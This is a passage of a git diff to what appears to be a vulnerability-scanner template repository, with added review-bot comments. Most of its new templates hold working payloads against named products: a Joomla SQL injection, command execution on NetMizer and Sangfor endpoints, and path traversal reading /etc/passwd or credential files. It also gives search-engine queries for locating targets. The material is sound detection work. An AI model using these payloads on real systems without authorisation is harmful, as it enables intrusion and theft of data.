 reference:
 - https://wordpress.org/plugins/wp-file-manager/
 metadata:
+ max-request: 1
 plugin_namespace: wp-file-manager
 wpscan: https://wpscan.com/plugin/wp-file-manager
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index 9c46352c5b..03ba28ee36 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/wp-google-maps/
 metadata:
+ max-request: 1
 plugin_namespace: wp-google-maps
 wpscan: https://wpscan.com/plugin/wp-google-maps
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 422664a98c..8f5fe8d9a5 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/wp-mail-smtp/
 metadata:
+ max-request: 1
 plugin_namespace: wp-mail-smtp
 wpscan: https://wpscan.com/plugin/wp-mail-smtp
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index f0af3a748a..0458b13354 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/wp-maintenance-mode/
 metadata:
+ max-request: 1
 plugin_namespace: wp-maintenance-mode
 wpscan: https://wpscan.com/plugin/wp-maintenance-mode
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index f89f1a20b3..d570be07bf 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/wp-migrate-db/
 metadata:
+ max-request: 1
 plugin_namespace: wp-migrate-db
 wpscan: https://wpscan.com/plugin/wp-migrate-db
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index 01fb12d0ad..ee05e3add8 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/wp-multibyte-patch/
 metadata:
+ max-request: 1
 plugin_namespace: wp-multibyte-patch
 wpscan: https://wpscan.com/plugin/wp-multibyte-patch
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index 1773857e15..df2487955f 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/wp-optimize/
 metadata:
+ max-request: 1
 plugin_namespace: wp-optimize
 wpscan: https://wpscan.com/plugin/wp-optimize
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index bcd1509c68..79ff01211c 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/wp-pagenavi/
 metadata:
+ max-request: 1
 plugin_namespace: wp-pagenavi
 wpscan: https://wpscan.com/plugin/wp-pagenavi
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index c6aca20a60..23414b3d1d 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: + max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 810fc82cde..0178c8e9fb 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: + max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 783d381ed8..a04ddc6003 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: + max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 8bdc600063..2ead906817 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: + max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index ab61cc0338..dedd2e23b6 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml 
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: + max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 5f6fbc1f75..03cd7137a8 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: + max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index d67150d038..a68d4b7d78 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: + max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index beeba7ca69..bf9dfc3ad8 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: + max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index c225df7bfd..47911a86a5 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: + max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaad04cb76..1c25b6f488 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: + max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index ff750a7d2a..b36317acd8 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: + max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index f1e7595ccd..5eb35dd17e 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml 
@@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: + max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 4b2769ee46..ceb2b8d600 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: + max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/vulnerabilities/bsphp-info.yaml b/http/vulnerabilities/bsphp-info.yaml new file mode 100644 index 0000000000..39876088cb --- /dev/null +++ b/http/vulnerabilities/bsphp-info.yaml 
@@ -0,0 +1,38 @@
+id: bsphp-info
+
+info:
+ name: BSPHP - Information Disclosure
+ author: ritikchaddha
+ severity: low
+ description: Information disclosure in BSPHP Pro causing user and unauth IP disclosure.
+ reference:
+ - https://github.com/Threekiii/Awesome-POC/blob/master/CMS%E6%BC%8F%E6%B4%9E/BSPHP%20index.php%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md
+ - https://github.com/bigblackhat/oFx/blob/main/poc/BSPHP/Info_Disclosure/poc.py
+ metadata:
+ max-request: 1
+ verified: true
+ fofa-query: title="BSPHP"
+ tags: bsphp,info,disclosure
+
+http:
+ - method: GET
+ path:
+ - '{{BaseURL}}/admin/index.php?m=admin&c=log&a=table_json&json=get&soso_ok=1&t=user_login_log&page=1&limit=10&bsphptime=1600407394176&soso_id=1&soso=&DESC=0'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '{"data":'
+ - '"id"'
+ - '"user"'
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - 'application/json'
+
+ - type: status
+ status:
+ - 200
diff --git a/http/vulnerabilities/discuz/discuz-api-pathinfo.yaml b/http/vulnerabilities/discuz/discuz-api-pathinfo.yaml
new file mode 100644
index 0000000000..31691c9d7e
--- /dev/null
+++ b/http/vulnerabilities/discuz/discuz-api-pathinfo.yaml
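Review bot: The probe URL in `path` asks for ten rows of the login log (`limit=10`), although the body matcher only needs the `"id"` and `"user"` keys to appear once. Using `limit=1` would keep the amount of user data pulled from a scanned host, and stored with the finding, to the minimum needed for detection, assuming the endpoint honours the parameter. The first word matcher in bsphp-info.yaml also leaves out `part: body`, which the other templates added in this commit state explicitly; adding `part: body` makes the intent readable without knowing the default.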
@@ -0,0 +1,39 @@
+id: discuz-api-pathinfo
+
+info:
+ name: Discuz! X2.5 - Path Disclosure
+ author: ritikchaddha
+ severity: low
+ description: Discuz! X2.5 api.php path disclosure vulnerability
+ reference:
+ - https://crx.xmspace.net/discuz_x25_api_php.html
+ - http://www.1314study.com/t/87417.html
+ metadata:
+ max-request: 1
+ verified: true
+ shodan-query: title:"Discuz!"
+ fofa-query: title="Discuz!"
+ tags: discuz,info,disclosure
+
+http:
+ - method: GET
+ path:
+ - '{{BaseURL}}/api.php?mod[]=auto'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '.php on line'
+ - 'function.array'
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - 'text/html'
+
+ - type: status
+ status:
+ - 200
diff --git a/http/vulnerabilities/joomla/joomla-department-sqli.yaml b/http/vulnerabilities/joomla/joomla-department-sqli.yaml
new file mode 100644
index 0000000000..5bd2be758e
--- /dev/null
+++ b/http/vulnerabilities/joomla/joomla-department-sqli.yaml
@@ -0,0 +1,29 @@
+id: joomla-department-sqli
+
+info:
+ name: Joomla `departments` - SQL Injection
+ author: ritikchaddha
+ severity: high
+ description: |
+ Joomla! `com_departments` parameter contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
+ reference:
+ - https://github.com/opensec-cn/kunpeng/blob/master/plugin/json/joomla_departments_sqli.json
+ - https://github.com/w3bd0gs/cocoworker/blob/master/plugins/beebeeto/poc_2014_0170.py
+ metadata:
+ max-request: 1
+ shodan-query: http.component:"Joomla"
+ tags: joomla,sqli
+
+variables:
+ num: "999999999"
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_departments&id=-1%20UNION%20SELECT%201,md5({{num}}),3,4,5,6,7,8--"
+
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '{{md5(num)}}'
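Review bot: The `description` in joomla-department-sqli.yaml calls `com_departments` a parameter, but in the request it is the value of `option` and the injected value travels in `id`. Wording such as `The id parameter of the Joomla! com_departments component contains a SQL injection vulnerability.` would describe what the template actually tests. The template has no status or header matcher; that looks deliberate because the body match is the MD5 of `num`, and a one-line comment above `matchers` saying so would save the next reader from wondering.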
diff --git a/http/vulnerabilities/netmizer/netmizer-cmd-rce.yaml b/http/vulnerabilities/netmizer/netmizer-cmd-rce.yaml
new file mode 100644
index 0000000000..07b676e6a4
--- /dev/null
+++ b/http/vulnerabilities/netmizer/netmizer-cmd-rce.yaml
@@ -0,0 +1,37 @@
+id: netmizer-cmd-rce
+
+info:
+ name: NetMizer LogManagement System cmd.php - Remote Code Execution
+ author: DhiyaneshDk
+ severity: critical
+ description: |
+ Remote Command Execution vulnerability in the NetMizer log management system cmd.php, and the attacker can execute the command by passing in the cmd parameter.
+ reference:
+ - https://github.com/Threekiii/Awesome-POC/blob/master/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/NetMizer%20%E6%97%A5%E5%BF%97%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20cmd.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
+ metadata:
+ max-request: 1
+ fofa-query: title="NetMizer 日志管理系统"
+ shodan-query: title:"NetMizer"
+ verified: true
+ tags: netmizer,cmd,rce
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/data/manage/cmd.php?cmd=id"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - 'uid=(\d+)\(.*?\) gid=(\d+)\(.*?\) groups=([\d,]+)\(.*?\)'
+
+ - type: word
+ part: header
+ words:
+ - 'text/html'
+
+ - type: status
+ status:
+ - 200
diff --git a/http/vulnerabilities/netmizer/netmizer-data-listing.yaml b/http/vulnerabilities/netmizer/netmizer-data-listing.yaml
new file mode 100644
index 0000000000..640054d5e2
--- /dev/null
+++ b/http/vulnerabilities/netmizer/netmizer-data-listing.yaml
@@ -0,0 +1,39 @@
+id: netmizer-data-listing
+
+info:
+ name: NetMizer LogManagement System Data - Directory Exposure
+ author: DhiyaneshDk
+ severity: high
+ description: |
+ Directory Exposure vulnerability in the NetMizer log management system of Beijing Lingzhou Network Technology Co., Ltd. Due to the loose control of /data, attackers can use this vulnerability to obtain sensitive information.
+ reference:
+ - https://github.com/Threekiii/Awesome-POC/blob/master/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/NetMizer%20%E6%97%A5%E5%BF%97%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20data%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.md
+ metadata:
+ max-request: 1
+ fofa-query: title="NetMizer 日志管理系统"
+ shodan-query: title:"NetMizer"
+ verified: true
+ tags: netmizer,exposure,listing
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/data/"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'Index of /data'
+ - 'bin/'
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - 'text/html'
+
+ - type: status
+ status:
+ - 200
diff --git a/http/vulnerabilities/other/acti-video-lfi.yaml b/http/vulnerabilities/other/acti-video-lfi.yaml
new file mode 100644
index 0000000000..90516b2ac4
--- /dev/null
+++ b/http/vulnerabilities/other/acti-video-lfi.yaml
@@ -0,0 +1,37 @@
+id: acti-video-lfi
+
+info:
+ name: ACTi-Video Monitoring - Local File Inclusion
+ author: DhiyaneshDk
+ severity: high
+ description: |
+ ACTI video surveillance has loopholes in reading any files
+ reference:
+ - https://www.cnblogs.com/hmesed/p/16292252.html
+ metadata:
+ max-request: 1
+ verified: true
+ fofa-query: app="ACTi-视频监控"
+ shodan-query: title:"Web Configurator"
+ tags: acti,lfi,iot,video,monitoring
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/images/../../../../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - "root:.*:0:0:"
+
+ - type: word
+ part: header
+ words:
+ - "application/octet-stream"
+
+ - type: status
+ status:
+ - 200
diff --git a/http/vulnerabilities/other/avcon6-execl-lfi.yaml b/http/vulnerabilities/other/avcon6-execl-lfi.yaml
new file mode 100644
index 0000000000..ecee030859
--- /dev/null
+++ b/http/vulnerabilities/other/avcon6-execl-lfi.yaml
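Review bot: The `description` in acti-video-lfi.yaml ("ACTI video surveillance has loopholes in reading any files") does not tell a triager what is exposed or through which path. The request shows a traversal sequence below `/images/` that is matched against the contents of `/etc/passwd`, so text such as `The ACTi video monitoring web interface allows arbitrary files to be read through path traversal under /images/.` would describe the finding. The vendor name is also cased `ACTi` in `name` and `ACTI` in the description; using one form keeps searches consistent.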
@@ -0,0 +1,38 @@
+id: avcon6-execl-lfi
+
+info:
+ name: AVCON6 org_execl_download.action - Arbitrary File Download
+ author: DhiyaneshDk
+ severity: high
+ description: |
+ Arbitrary File Download vulnerability in the org_execl_download.action of the AVCON6 system management platform, through which an attacker can download arbitrary files from the server
+ reference:
+ - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/AVCON6%20%E7%B3%BB%E7%BB%9F%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20org_execl_download.action%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD%E6%BC%8F%E6%B4%9E.md
+ metadata:
+ max-request: 1
+ verified: true
+ fofa-query: app="AVCON-6"
+ tags: avcon6,lfi
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/org_execl_download.action?filename=../../../../../../../../../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - "root:.*:0:0:"
+
+ - type: word
+ part: header
+ words:
+ - "application/octet-stream"
+ - "filename="
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/http/vulnerabilities/other/avcon6-lfi.yaml b/http/vulnerabilities/other/avcon6-lfi.yaml
new file mode 100644
index 0000000000..1ae56b3b3c
--- /dev/null
+++ b/http/vulnerabilities/other/avcon6-lfi.yaml
@@ -0,0 +1,38 @@
+id: avcon6-lfi
+
+info:
+ name: AVCON6 - Arbitrary File Download
+ author: DhiyaneshDk
+ severity: high
+ description: |
+ File Download vulnerability in the download.action of the AVCON6 system management platform, through which an attacker can download arbitrary files from the server
+ reference:
+ - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/AVCON6%20%E7%B3%BB%E7%BB%9F%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20download.action%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD%E6%BC%8F%E6%B4%9E.md
+ metadata:
+ max-request: 1
+ verified: true
+ fofa-query: app="AVCON-6"
+ tags: avcon6,lfi
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/download.action?filename=../../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - "root:.*:0:0:"
+
+ - type: word
+ part: header
+ words:
+ - "application/octet-stream"
+ - "filename="
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/http/vulnerabilities/other/clodop-printer-lfi.yaml b/http/vulnerabilities/other/clodop-printer-lfi.yaml
new file mode 100644
index 0000000000..7933be851c
--- /dev/null
+++ b/http/vulnerabilities/other/clodop-printer-lfi.yaml
@@ -0,0 +1,40 @@
+id: clodop-printer-lfi
+
+info:
+ name: C-Lodop Printer - Arbitrary File Read
+ author: DhiyaneshDk
+ severity: high
+ description: |
+ The C-Lodop printer has an arbitrary file reading vulnerability. By constructing a special URL, it can read any file in the system.
+ reference:
+ - https://github.com/Threekiii/Awesome-POC/blob/8e4f0be1f75a71cffe4b2c2c558ad1cd4d03d9a7/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/C-Lodop%E6%89%93%E5%8D%B0%E6%9C%BA%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
+ metadata:
+ max-request: 1
+ shodan-query: title:"Welcome to C-Lodop"
+ fofa-query: title="C-Lodop"
+ verified: true
+ tags: c-lodop,lfi,printer,iot
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "bit app support"
+ - "fonts"
+ - "extensions"
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - "application/octet-stream"
+
+ - type: status
+ status:
+ - 200
diff --git a/http/vulnerabilities/other/easyimage-downphp-lfi.yaml b/http/vulnerabilities/other/easyimage-downphp-lfi.yaml
new file mode 100644
index 0000000000..f095dfae89
--- /dev/null
+++ b/http/vulnerabilities/other/easyimage-downphp-lfi.yaml
@@ -0,0 +1,37 @@
+id: easyimage-downphp-lfi
+
+info:
+ name: EasyImage down.php - Arbitrary File Read
+ author: DhiyaneshDk
+ severity: high
+ reference:
+ - https://github.com/qingchenhh/qc_poc/blob/main/Goby/EasyImage_down.php_file_read.go
+ metadata:
+ max-request: 1
+ verified: true
+ fofa-query: app="EasyImage-简单图床"
+ tags: easyimage,lfi,exposure,config
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/application/down.php?dw=config/config.php"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "'user'=>"
+ - "'password'=>"
+ - "EasyImage"
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - 'text/html'
+
+ - type: status
+ status:
+ - 200
diff --git a/http/vulnerabilities/other/kodak-network-lfi.yaml b/http/vulnerabilities/other/kodak-network-lfi.yaml
new file mode 100644
index 0000000000..c39b7ff202
--- /dev/null
+++ b/http/vulnerabilities/other/kodak-network-lfi.yaml
@@ -0,0 +1,38 @@
+id: kedacom-network-lfi
+
+info:
+ name: Kedacom Network Keyboard Console - Arbitrary File Read
+ author: DhiyaneshDk
+ severity: high
+ description: |
+ There is an arbitrary file reading vulnerability in the KEDACOM network keyboard console. Attacking this vulnerability can read arbitrary information from the server
+ reference:
+ - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E7%A7%91%E8%BE%BE%20%E7%BD%91%E7%BB%9C%E9%94%AE%E7%9B%98%E6%8E%A7%E5%88%B6%E5%8F%B0%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
+ metadata:
+ max-request: 1
+ verified: true
+ fofa-query: "网络键盘控制台"
+ tags: lfi,kedacom,network
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/../../../../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - "root:.*:0:0:"
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+ - "Server: kedacom-hs"
+ condition: and
+
+ - type: status
+ status:
+ - 200
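Review bot: easyimage-downphp-lfi.yaml has no `description` under `info`, so a finding carries only the name and a link to third-party PoC code; `sangfor-cphp-rce`, `zzzcms-ssrf` and `zzzcms-xss` later in this commit have the same gap. For this file, text such as `EasyImage down.php returns the file named in the dw parameter, which exposes config/config.php including the stored user and password.` matches what the request and the body matcher show. Each of the other three needs a sentence of the same kind, naming the endpoint and the parameter that the request uses.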
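Review bot: The new file is named `kodak-network-lfi.yaml`, but its `id` is `kedacom-network-lfi`, and the name, description, tags and the `Server: kedacom-hs` header matcher all refer to Kedacom. The file name looks like a slip; renaming it to `kedacom-network-lfi.yaml` keeps path and id in step, so that path-based excludes, ID-based filters and reports all point at the same template. Any entries for this path in `.new-additions` and `templates-checksum.txt` would need the same rename.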
diff --git a/http/vulnerabilities/other/sangfor-cphp-rce.yaml b/http/vulnerabilities/other/sangfor-cphp-rce.yaml
new file mode 100644
index 0000000000..82bbf2c6cc
--- /dev/null
+++ b/http/vulnerabilities/other/sangfor-cphp-rce.yaml
@@ -0,0 +1,31 @@
+id: sangfor-cphp-rce
+
+info:
+ name: Sangfor Log Center - Remote Command Execution
+ author: DhiyaneshDk
+ severity: critical
+ reference:
+ - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%B7%B1%E4%BF%A1%E6%9C%8D%20%E6%97%A5%E5%BF%97%E4%B8%AD%E5%BF%83%20c.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md?plain=1
+ metadata:
+ max-request: 1
+ verified: true
+ fofa-query: "isHighPerformance : !!SFIsHighPerformance"
+ tags: sangfor,rce
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/tool/log/c.php?strip_slashes=system&host=ipconfig"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "Windows IP"
+ - "Log Helper"
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/http/vulnerabilities/other/sangfor-download-lfi.yaml b/http/vulnerabilities/other/sangfor-download-lfi.yaml
new file mode 100644
index 0000000000..cd7109ea4a
--- /dev/null
+++ b/http/vulnerabilities/other/sangfor-download-lfi.yaml
@@ -0,0 +1,38 @@
+id: sangfor-download-lfi
+
+info:
+ name: Sangfor Application download.php - Arbitary File Read
+ author: DhiyaneshDk
+ severity: high
+ description: |
+ There is an arbitrary file reading vulnerability in the Sangfor Application download.php.
+ reference:
+ - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%B7%B1%E4%BF%A1%E6%9C%8D%20%E5%BA%94%E7%94%A8%E4%BA%A4%E4%BB%98%E6%8A%A5%E8%A1%A8%E7%B3%BB%E7%BB%9F%20download.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md?plain=1
+ metadata:
+ max-request: 1
